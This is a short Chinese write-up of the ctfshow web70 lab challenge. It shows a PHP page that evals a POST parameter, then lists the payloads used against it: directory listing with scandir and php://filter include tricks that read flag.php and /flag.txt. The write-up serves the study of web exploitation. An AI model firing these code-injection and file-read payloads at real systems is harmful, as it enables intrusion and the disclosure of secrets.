[ctfshow web入门] web70

信息收集

使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php
error_reporting和ini_set被禁用了，不必管他

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

解题

照例查目录，读flag.php

c=var_export(scandir('.'));
c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));

c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");

flag不在这里，读根目录

c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));

c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");

---

web69    目录    web71